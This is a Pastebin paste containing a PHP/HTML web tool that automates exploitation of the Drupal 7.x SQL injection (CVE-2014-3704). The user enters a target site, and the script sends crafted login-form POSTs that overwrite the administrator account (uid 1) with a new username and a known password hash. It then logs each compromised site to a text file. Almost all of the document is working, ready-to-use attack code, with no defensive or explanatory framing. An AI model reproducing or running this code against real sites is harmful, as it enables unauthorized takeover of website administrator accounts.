jackwilder

Drupal core 7.x Auto SQL Injection

Jun 11th, 2015
5,639
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php ?>  <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploit</title>
  5. <body>
  6. </head>
  7. <body>
  8.     <div class="mymargin">
  9.         <center>
  10.             <font color="red"><h1>Drupal Exploit</h1></font>
  11.              
  12.     <form method="GET" action="">
  13.         Site : <input type="text" name="url" placeholder="Example: www.site.com">
  14.         <input type="submit" name="submit" value="suck it !">
  15.     </form>
  16.     <br>
  17. <?php
  18. #-----------------------------------------------------------------------------#
  19. # Exploit Title: Drupal core 7.x - SQL Injection                              #
  20. # Date: Oct 16 2014                                                           #
  21. # Exploit Author: Dustin D&#1043;rr                                                 #
  22. # Software Link: http://www.drupal.com/                                       #
  23. # Version: Drupal core 7.x versions prior to 7.32                             #
  24. # CVE: CVE-2014-3704                                                          #
  25. #-----------------------------------------------------------------------------#
  26. $file = fopen("rock-you.txt", "a");
  27. error_reporting(0);
  28. if (isset($_GET['submit'])) {
  29.     $url = "http://" . $_GET['url'];
  30.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  31.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  32. ", 'content' => $post_data));
  33.     $ctx = stream_context_create($params);
  34.     $data = file_get_contents($url . '/user/login/', null, $ctx);
  35.     echo "<h4>Scanning at \"/user/login/</h4>\"";
  36.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  37.         $fp = fopen("rock-you.txt", 'a');
  38.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  39.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
  40.         fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
  41.         fwrite($fp, "
  42. ");
  43.         fwrite($fp, "======================================Donnazmi==============================================================");
  44.         fwrite($fp, "
  45. ");
  46.         fclose($fp);
  47.     } else {
  48.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  49.     }
  50. }
  51. if (isset($_GET['submit'])) {
  52.     $url = "http://" . $_GET['url'] . "/";
  53.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  54.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  55. ", 'content' => $post_data));
  56.     $ctx = stream_context_create($params);
  57.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  58.     echo "<h4>Scanning at \"Index</h4>\"";
  59.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  60.         $fp = fopen("rock-you.txt", 'a');
  61.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  62.         echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
  63.         fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
  64.         fwrite($fp, "
  65. ");
  66.         fwrite($fp, "======================================Donnazmi==============================================================");
  67.         fwrite($fp, "
  68. ");
  69.         fclose($fp);
  70.     } else {
  71.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  72.     }
  73. }
  74. ?>
  75. <br>
  76.     </div>
  77.  
  78. </body>
  79. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×